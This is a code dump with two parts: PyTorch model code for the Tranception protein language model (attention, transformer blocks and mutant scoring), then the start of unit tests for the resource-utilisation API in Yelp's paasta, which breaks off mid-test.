query, key, value = self.c_attn(hidden_states).split(self.split_size, dim=2)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key, past_value = layer_past
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
if self.attention_mode=="tranception":
# We do not do anything on the first self.num_heads_per_kernel_size heads (kernel =1)
query_list=[query[:,:self.num_heads_per_kernel_size,:,:]]
key_list=[key[:,:self.num_heads_per_kernel_size,:,:]]
value_list=[value[:,:self.num_heads_per_kernel_size,:,:]]
for kernel_idx in range(3):
query_list.append(self.query_depthwiseconv[str(kernel_idx)](query[:,(kernel_idx+1)*self.num_heads_per_kernel_size:(kernel_idx+2)*self.num_heads_per_kernel_size,:,:]))
key_list.append(self.key_depthwiseconv[str(kernel_idx)](key[:,(kernel_idx+1)*self.num_heads_per_kernel_size:(kernel_idx+2)*self.num_heads_per_kernel_size,:,:]))
value_list.append(self.value_depthwiseconv[str(kernel_idx)](value[:,(kernel_idx+1)*self.num_heads_per_kernel_size:(kernel_idx+2)*self.num_heads_per_kernel_size,:,:]))
query=torch.cat(query_list, dim=1)
key=torch.cat(key_list, dim=1)
value=torch.cat(value_list, dim=1)
attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask, alibi_bias=alibi_bias)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.c_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
class TranceptionBlockMLP(nn.Module):
def __init__(self, intermediate_size, config):
super().__init__()
embed_dim = config.hidden_size
self.c_fc = Conv1D(intermediate_size, embed_dim)
self.c_proj = Conv1D(embed_dim, intermediate_size)
self.act = tranception_ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_pdrop)
def forward(self, hidden_states):
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class TranceptionBlock(nn.Module):
def __init__(self, config, SDWC_kernel_size=None):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.n_inner if config.n_inner is not None else 4 * hidden_size
self.ln_1 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.attn = TranceptionBlockAttention(config, SDWC_kernel_size=SDWC_kernel_size)
self.ln_2 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
if config.add_cross_attention:
self.crossattention = TranceptionBlockAttention(config, is_cross_attention=True, SDWC_kernel_size=SDWC_kernel_size)
self.ln_cross_attn = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = TranceptionBlockMLP(inner_dim, config)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
use_cache=False,
output_attentions=False,
alibi_bias=None,
):
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
alibi_bias=alibi_bias,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
if encoder_hidden_states is not None:
# add one self-attention block for cross-attention
if not hasattr(self, "crossattention"):
raise ValueError(
f"If `encoder_hidden_states` are passed, {self} has to be instantiated with "
"cross-attention layers by setting `config.add_cross_attention=True`"
)
residual = hidden_states
hidden_states = self.ln_cross_attn(hidden_states)
cross_attn_outputs = self.crossattention(
hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
)
attn_output = cross_attn_outputs[0]
# residual connection
hidden_states = residual + attn_output
outputs = outputs + cross_attn_outputs[2:] # add cross attentions if we output attention weights
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
hidden_states = residual + feed_forward_hidden_states
if use_cache:
outputs = (hidden_states,) + outputs
else:
outputs = (hidden_states,) + outputs[1:]
return outputs # hidden_states, present, (attentions, cross_attentions)
class TranceptionModel(GPT2PreTrainedModel):
_keys_to_ignore_on_load_missing = ["attn.masked_bias"]
def __init__(self, config):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.position_embedding = config.position_embedding if hasattr(config, "position_embedding") else "learned"
if self.position_embedding=="learned":
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.alibi = None
elif self.position_embedding=="grouped_alibi":
maxpos = config.n_positions
attn_heads = config.n_head
self.slopes = torch.Tensor(get_slopes(attn_heads, mode=self.position_embedding))
#The softmax operation is invariant to translation, and bias functions used are always linear.
alibi = self.slopes.unsqueeze(1).unsqueeze(1) * torch.arange(maxpos).unsqueeze(0).unsqueeze(0).expand(attn_heads, -1, -1)
alibi = alibi.view(attn_heads, 1, maxpos)
self.register_buffer('alibi',alibi)
self.drop = nn.Dropout(config.embd_pdrop)
self.h = nn.ModuleList([TranceptionBlock(config) for _ in range(config.num_hidden_layers)])
self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
self.init_weights()
# Model parallel
self.model_parallel = False
self.device_map = None
self.gradient_checkpointing = False
def parallelize(self, device_map=None, num_cores=None):
self.device_map = (
get_device_map(len(self.h), range(torch.cuda.device_count())) if device_map is None else device_map
)
device_prefix="cuda:"
assert_device_map(self.device_map, len(self.h))
self.model_parallel = True
self.first_device = "cpu" if "cpu" in self.device_map.keys() else device_prefix + str(min(self.device_map.keys()))
self.last_device = device_prefix + str(max(self.device_map.keys()))
self.wte = self.wte.to(self.first_device)
if self.position_embedding=="learned":
self.wpe = self.wpe.to(self.first_device)
for k, v in self.device_map.items():
print("k,v :"+str(k)+","+str(v))
for block in v:
cuda_device = device_prefix + str(k)
self.h[block] = self.h[block].to(cuda_device)
self.ln_f = self.ln_f.to(self.last_device)
def deparallelize(self):
self.model_parallel = False
self.device_map = None
self.first_device = "cpu"
self.last_device = "cpu"
self.wte = self.wte.to("cpu")
if self.position_embedding=="learned":
self.wpe = self.wpe.to("cpu")
for index in range(len(self.h)):
self.h[index] = self.h[index].to("cpu")
self.ln_f = self.ln_f.to("cpu")
torch.cuda.empty_cache()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
"""
for layer, heads in heads_to_prune.items():
self.h[layer].attn.prune_heads(heads)
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# GPT2Attention mask.
if attention_mask is not None:
if batch_size <= 0:
raise ValueError("batch_size has to be defined and > 0")
attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
attention_mask = attention_mask[:, None, None, :]
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility
attention_mask = (1.0 - attention_mask) * -10000.0
# If a 2D ou 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.add_cross_attention and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# head_mask has shape n_layer x batch x n_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.n_layer)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
if self.position_embedding=="learned":
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
else:
hidden_states = inputs_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_cross_attentions = () if output_attentions and self.config.add_cross_attention else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
# Model parallel
if self.model_parallel:
torch.cuda.set_device(hidden_states.device)
# Ensure layer_past is on same device as hidden_states (might not be correct)
if layer_past is not None:
layer_past = tuple(past_state.to(hidden_states.device) for past_state in layer_past)
# Ensure that attention_mask is always on the same device as hidden_states
if attention_mask is not None:
attention_mask = attention_mask.to(hidden_states.device)
if isinstance(head_mask, torch.Tensor):
head_mask = head_mask.to(hidden_states.device)
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if self.gradient_checkpointing and self.training:
if use_cache:
print("`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`...")
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
)
else:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask[i],
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
alibi_bias=self.alibi if hasattr(self, "alibi") else None
)
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
if self.config.add_cross_attention:
all_cross_attentions = all_cross_attentions + (outputs[3 if use_cache else 2],)
if self.model_parallel:
device_prefix="cuda:"
for k, v in self.device_map.items():
if i == v[-1] and device_prefix + str(k) != self.last_device:
hidden_states = hidden_states.to(device_prefix + str(k + 1))
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(
v
for v in [hidden_states, presents, all_hidden_states, all_self_attentions, all_cross_attentions]
if v is not None
)
return BaseModelOutputWithPastAndCrossAttentions(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
cross_attentions=all_cross_attentions,
)
class TranceptionLMHeadModel(GPT2PreTrainedModel):
_keys_to_ignore_on_load_missing = [r"attn.masked_bias", r"attn.bias", r"lm_head.weight"]
def __init__(self, config):
super().__init__(config)
self.transformer = TranceptionModel(config)
self.lm_head = nn.Linear(config.n_embd, config.vocab_size, bias=False)
self.config = config
self.init_weights()
self.default_model_device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Model parallel
self.model_parallel = False
self.device_map = None
self.retrieval_aggregation_mode = config.retrieval_aggregation_mode if hasattr(config, "retrieval_aggregation_mode") else None
if self.retrieval_aggregation_mode is not None:
print("Model leverages both autoregressive and retrieval inference")
self.MSA_filename = config.MSA_filename if hasattr(config, "MSA_filename") else False
self.MSA_folder = '/'.join(self.MSA_filename.split(os.sep)[:-1])
self.MSA_name = self.MSA_filename.split(os.sep)[-1]
self.retrieval_inference_weight_LR = config.retrieval_inference_weight if hasattr(config, "retrieval_inference_weight") else 0.6
self.retrieval_inference_weight_RL = config.retrieval_inference_weight if hasattr(config, "retrieval_inference_weight") else 0.6
self.MSA_start=config.MSA_start
self.MSA_end=config.MSA_end
self.full_protein_length = config.full_protein_length if hasattr(config, "full_protein_length") else -1
self.MSA_log_prior = torch.log(torch.tensor(
msa_utils.get_msa_prior(
MSA_data_file=self.MSA_filename,
MSA_weight_file_name=config.MSA_weight_file_name,
retrieval_aggregation_mode=self.retrieval_aggregation_mode,
MSA_start=self.MSA_start,
MSA_end=self.MSA_end,
len_target_seq=self.full_protein_length,
vocab=config.tokenizer.get_vocab(),
verbose=False
)
).float().to(self.default_model_device))
else:
print("Model only uses autoregressive inference")
def parallelize(self, device_map=None, num_cores=None, num_pipelines=1):
self.num_pipelines=num_pipelines
self.device_map = (
get_device_map(len(self.transformer.h), range(torch.cuda.device_count()))
if device_map is None
else device_map
)
assert_device_map(self.device_map, len(self.transformer.h))
self.transformer.parallelize(self.device_map, num_cores=num_cores)
self.lm_head = self.lm_head.to(self.transformer.first_device)
self.model_parallel = True
def deparallelize(self):
self.transformer.deparallelize()
self.transformer = self.transformer.to("cpu")
self.lm_head = self.lm_head.to("cpu")
self.model_parallel = False
torch.cuda.empty_cache()
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def prepare_inputs_for_generation(self, input_ids, past=None, **kwargs):
token_type_ids = kwargs.get("token_type_ids", None)
# only last token for inputs_ids if past is defined in kwargs
if past:
input_ids = input_ids[:, -1].unsqueeze(-1)
if token_type_ids is not None:
token_type_ids = token_type_ids[:, -1].unsqueeze(-1)
attention_mask = kwargs.get("attention_mask", None)
position_ids = kwargs.get("position_ids", None)
if attention_mask is not None and position_ids is None:
# create position_ids on the fly for batch generation
position_ids = attention_mask.long().cumsum(-1) - 1
position_ids.masked_fill_(attention_mask == 0, 1)
if past:
position_ids = position_ids[:, -1].unsqueeze(-1)
else:
position_ids = None
return {
"input_ids": input_ids,
"past_key_values": past,
"use_cache": kwargs.get("use_cache"),
"position_ids": position_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
"flip": kwargs.get("flip", None),
}
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
flip=None,
start_slice=None,
end_slice=None,
mutated_sequence=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
``labels = input_ids`` Indices are selected in ``[-100, 0, ..., config.vocab_size]`` All labels set to
``-100`` are ignored (masked), the loss is only computed for labels in ``[0, ..., config.vocab_size]``
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict
)
hidden_states = transformer_outputs[0]
# Set device for model parallelism
if self.model_parallel:
torch.cuda.set_device(self.transformer.first_device)
hidden_states = hidden_states.to(self.lm_head.weight.device)
self.MSA_log_prior = self.MSA_log_prior.to(self.lm_head.weight.device)
lm_logits = self.lm_head(hidden_states)
loss = None
fused_shift_log_probas = None
if labels is not None:
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
if self.retrieval_aggregation_mode is not None:
batch_size = input_ids.size(0)
if self.retrieval_aggregation_mode=="aggregate_indel":
assert batch_size==1, "Aggregate indel is only supported for batch size of 1"
truncated_sequence_text = mutated_sequence[0][start_slice[0]:end_slice[0]]
if len(truncated_sequence_text)!=shift_logits.shape[1]-1: # shift_logits only has one extra token compared to truncated_sequence_text (the BOS token)
print("Tokenization error -- seq length: {} and shift_logits length - 1 : {}".format(len(mutated_sequence),shift_logits.shape[1]-1))
MSA_log_prior, MSA_start, MSA_end = msa_utils.update_retrieved_MSA_log_prior_indel(self, self.MSA_log_prior, self.MSA_start, self.MSA_end, mutated_sequence[0])
elif self.retrieval_aggregation_mode=="aggregate_substitution":
MSA_log_prior=self.MSA_log_prior
MSA_start=self.MSA_start
MSA_end=self.MSA_end
shift_log_probas = torch.log_softmax(shift_logits,dim=-1)
fused_shift_log_probas = shift_log_probas.clone()
if flip is None:
flip = torch.zeros(batch_size).to(fused_shift_log_probas.device)
flip = flip > 0
for seq_index in range(batch_size):
min_prior_slice = max(start_slice[seq_index], MSA_start)
max_prior_slice = min(end_slice[seq_index], MSA_end)
if max_prior_slice <= min_prior_slice:
print("Non overlapping region detected: min_prior_slice {} and max_prior_slice {}".format(min_prior_slice,max_prior_slice))
continue
slice_prior = MSA_log_prior[min_prior_slice:max_prior_slice,:].to(fused_shift_log_probas.device)
if flip[seq_index]:
slice_prior = torch.flip(slice_prior,dims=(0,))
min_logits_slice = max(0,end_slice[seq_index]-MSA_end)
max_logits_slice = min_logits_slice + (max_prior_slice-min_prior_slice)
fused_shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] = (1-self.retrieval_inference_weight_RL)*shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] + self.retrieval_inference_weight_RL*slice_prior
else:
min_logits_slice = max(0, MSA_start-start_slice[seq_index])
max_logits_slice = min_logits_slice + (max_prior_slice-min_prior_slice)
fused_shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] = (1-self.retrieval_inference_weight_LR)*shift_log_probas[seq_index,min_logits_slice:max_logits_slice,:] + self.retrieval_inference_weight_LR*slice_prior
if self.retrieval_aggregation_mode=="aggregate_indel":
try:
# If a given residue colume is an added zero-column, then we overwrite prior fusion and only predict based on the autoregressive transformer inference mode.
inserted_retrieval_positions = [True if slice_prior[i].sum()==0 else False for i in range(len(slice_prior))]+[True] #Last True is for the end of sentence token
fused_shift_log_probas[:,inserted_retrieval_positions,:]=shift_log_probas[:,inserted_retrieval_positions,:]
except:
print("Error when adding zero column(s) to account for insertion mutations.")
loss_fct = NLLLoss(reduction='none')
loss = loss_fct(input=fused_shift_log_probas.view(-1, fused_shift_log_probas.size(-1)), target=shift_labels.view(-1)).view(fused_shift_log_probas.shape[0],fused_shift_log_probas.shape[1])
mask = attention_mask[..., 1:].float()
mask[mask==0]=float('nan')
loss *= mask
loss = nanmean(loss, dim=1).mean()
else:
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
if not return_dict:
output = (lm_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return TranceptionCausalLMOutputWithCrossAttentions(
loss=loss,
logits=lm_logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
cross_attentions=transformer_outputs.cross_attentions,
fused_shift_log_probas=fused_shift_log_probas
)
@staticmethod
def _reorder_cache(past: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor) -> Tuple[Tuple[torch.Tensor]]:
"""
This function is used to re-order the :obj:`past_key_values` cache if
:meth:`~transformers.PreTrainedModel.beam_search` or :meth:`~transformers.PreTrainedModel.beam_sample` is
called. This is required to match :obj:`past_key_values` with the correct beam_idx at every generation step.
"""
return tuple(
tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past)
for layer_past in past
)
def score_mutants(self, DMS_data, target_seq=None, scoring_mirror=True, batch_size_inference=10, num_workers=10, indel_mode=False):
"""
Method to score mutants in an input DMS file.
DMS_data: (dataframe) Dataframe containing the list of mutated sequences for scoring.
target_seq: (string) Full reference sequence (wild type) that is mutated in the DMS assay. If not None, returned scores are delta log likelihood wrt that sequence.
scoring_mirror: (bool) Whether to score mutated sequences from both directions (Left->Right and Right->Left).
batch_size_inference: (int) Batch size for scoring.
num_workers: (int) Number of workers to be used in the data loader.
indel_mode: (bool) Flag to be used when scoring insertions and deletions. Otherwise assumes substitutions.
"""
df = DMS_data.copy()
if ('mutated_sequence' not in df) and (not indel_mode): df['mutated_sequence'] = df['mutant'].apply(lambda x: scoring_utils.get_mutated_sequence(target_seq, x))
assert ('mutated_sequence' in df), "DMS file to score does not have mutated_sequence column"
#if 'mutant' not in df: df['mutant'] = df['mutated_sequence'] #if mutant not in DMS file we default to mutated_sequence
if 'DMS_score' in df: del df['DMS_score']
if 'DMS_score_bin' in df: del df['DMS_score_bin']
if target_seq is not None:
df_left_to_right_slices = scoring_utils.get_sequence_slices(df, target_seq=target_seq, model_context_len = self.config.n_ctx - 2, indel_mode=indel_mode, scoring_window=self.config.scoring_window)
else:
df_left_to_right_slices = scoring_utils.get_sequence_slices(df, target_seq=list(df['mutated_sequence'])[0], model_context_len = self.config.n_ctx - 2, indel_mode=indel_mode, scoring_window='sliding')
print("Scoring sequences from left to right")
scores_L_to_R = scoring_utils.get_tranception_scores_mutated_sequences(model=self, mutated_sequence_df=df_left_to_right_slices, batch_size_inference=batch_size_inference, score_var_name='avg_score_L_to_R', target_seq=target_seq, num_workers=num_workers, indel_mode=indel_mode)
if scoring_mirror:
print("Scoring sequences from right to left")
df_right_to_left_slices = df_left_to_right_slices.copy()
df_right_to_left_slices['sliced_mutated_sequence'] = df_right_to_left_slices['sliced_mutated_sequence'].apply(lambda x: x[::-1])
scores_R_to_L = scoring_utils.get_tranception_scores_mutated_sequences(model=self, mutated_sequence_df=df_right_to_left_slices, batch_size_inference=batch_size_inference, score_var_name='avg_score_R_to_L', target_seq=target_seq, num_workers=num_workers, reverse=True, indel_mode=indel_mode)
all_scores = pd.merge(scores_L_to_R, scores_R_to_L, on='mutated_sequence', how='left', suffixes=('','_R_to_L'))
all_scores['avg_score'] = (all_scores['avg_score_L_to_R'] + all_scores['avg_score_R_to_L']) / 2.0
else:
all_scores = scores_L_to_R
all_scores['avg_score'] = all_scores['avg_score_L_to_R']
#By design "get_tranception_scores_mutated_sequences" drops the WT from the output. We add it back if that was one of the sequences to score in the DMS (score=0 by definition)
if target_seq in DMS_data.mutated_sequence.values:
if scoring_mirror:
wt_row = pd.DataFrame([[target_seq,0,0,0]], columns=['mutated_sequence','avg_score_L_to_R','avg_score_R_to_L','avg_score'])
else:
wt_row = pd.DataFrame([[target_seq,0,0]], columns=['mutated_sequence','avg_score_L_to_R','avg_score'])
all_scores = pd.concat([all_scores,wt_row], ignore_index=True)
return all_scores
def encode_batch(self, protein_sequence, sequence_name="sliced_mutated_sequence"):
"""
Method to process an input AA sequence batch (protein_sequence) and return a tokenized sequence (via the tokenizer associated to the model).
"""
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='X', char_replacements='ACDEFGHIKLMNPQRSTVWY')
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='B', char_replacements='DN')
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='J', char_replacements='IL')
protein_sequence[sequence_name] = scoring_utils.sequence_replace(sequences=protein_sequence[sequence_name], char_to_replace='Z', char_replacements='EQ')
return self.config.tokenizer(list(protein_sequence[sequence_name]), add_special_tokens=True, truncation=True, padding=True, max_length=self.config.n_ctx)
|
0aee10042593f709c4e3461b8aca202760061359
|
97d7455fbaa56813e97cf601e4a23786d47c2e2c
|
/tests/api/test_resources.py
|
49968544987a62932eb6e7798b29cc74b73255fb
|
[
"Apache-2.0"
] |
permissive
|
Yelp/paasta
|
9138fbb0beaaa6146520c1483144679f9d5d4941
|
6fafc7c86073f136e64b959b963994be3d6160ab
|
refs/heads/master
| 2023-08-17T00:00:47.610727
| 2023-08-10T21:40:26
| 2023-08-10T21:40:26
| 44,998,824
| 1,805
| 291
|
Apache-2.0
| 2023-09-13T20:40:04
| 2015-10-26T21:35:53
|
Python
|
UTF-8
|
Python
| false
| false
| 5,912
|
py
|
test_resources.py
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import asynctest
import mock
from pyramid import testing
from paasta_tools.api.views.resources import parse_filters
from paasta_tools.api.views.resources import resources_utilization
from paasta_tools.metrics import metastatus_lib
def test_parse_filters_empty():
filters = None
parsed = parse_filters(filters)
assert parsed == {}
def test_parse_filters_good():
filters = ["foo:bar,baz", "qux:zol"]
parsed = parse_filters(filters)
assert "foo" in parsed.keys()
assert "qux" in parsed.keys()
assert "bar" in parsed["foo"]
assert "baz" in parsed["foo"]
assert "zol" in parsed["qux"]
@mock.patch(
"paasta_tools.api.views.resources.metastatus_lib.get_resource_utilization_by_grouping",
autospec=True,
)
@mock.patch("paasta_tools.api.views.resources.get_mesos_master", autospec=True)
def test_resources_utilization_nothing_special(
mock_get_mesos_master, mock_get_resource_utilization_by_grouping
):
request = testing.DummyRequest()
request.swagger_data = {"groupings": None, "filter": None}
mock_mesos_state = mock.Mock()
mock_master = mock.Mock(
state=asynctest.CoroutineMock(return_value=mock_mesos_state)
)
mock_get_mesos_master.return_value = mock_master
mock_get_resource_utilization_by_grouping.return_value = {
frozenset([("superregion", "unknown")]): {
"total": metastatus_lib.ResourceInfo(cpus=10.0, mem=512.0, disk=100.0),
"free": metastatus_lib.ResourceInfo(cpus=8.0, mem=312.0, disk=20.0),
}
}
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
assert len(body) == 1
assert set(body[0].keys()) == {"disk", "mem", "groupings", "cpus", "gpus"}
mock_mesos_state = {
"slaves": [
{
"id": "foo1",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "default", "region": "top"},
"reserved_resources": {},
},
{
"id": "bar1",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "default", "region": "bottom"},
"reserved_resources": {},
},
{
"id": "foo2",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "top"},
"reserved_resources": {},
},
{
"id": "bar2",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "bottom"},
"reserved_resources": {},
},
{
"id": "foo3",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "top"},
"reserved_resources": {},
},
{
"id": "bar2",
"resources": {"disk": 100, "cpus": 10, "mem": 50},
"attributes": {"pool": "other", "region": "bottom"},
"reserved_resources": {},
},
],
"frameworks": [
{
"tasks": [
{
"state": "TASK_RUNNING",
"resources": {"cpus": 1, "mem": 10, "disk": 10},
"slave_id": "foo1",
},
{
"state": "TASK_RUNNING",
"resources": {"cpus": 1, "mem": 10, "disk": 10},
"slave_id": "bar1",
},
]
}
],
}
@mock.patch("paasta_tools.api.views.resources.get_mesos_master", autospec=True)
def test_resources_utilization_with_grouping(mock_get_mesos_master):
request = testing.DummyRequest()
request.swagger_data = {"groupings": ["region", "pool"], "filter": None}
mock_master = mock.Mock(
state=asynctest.CoroutineMock(
func=asynctest.CoroutineMock(), # https://github.com/notion/a_sync/pull/40
return_value=mock_mesos_state,
)
)
mock_get_mesos_master.return_value = mock_master
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
# 4 groupings, 2x2 attrs for 5 slaves
assert len(body) == 4
@mock.patch("paasta_tools.api.views.resources.get_mesos_master", autospec=True)
def test_resources_utilization_with_filter(mock_get_mesos_master):
request = testing.DummyRequest()
request.swagger_data = {
"groupings": ["region", "pool"],
"filter": ["region:top", "pool:default,other"],
}
mock_master = mock.Mock(
state=asynctest.CoroutineMock(
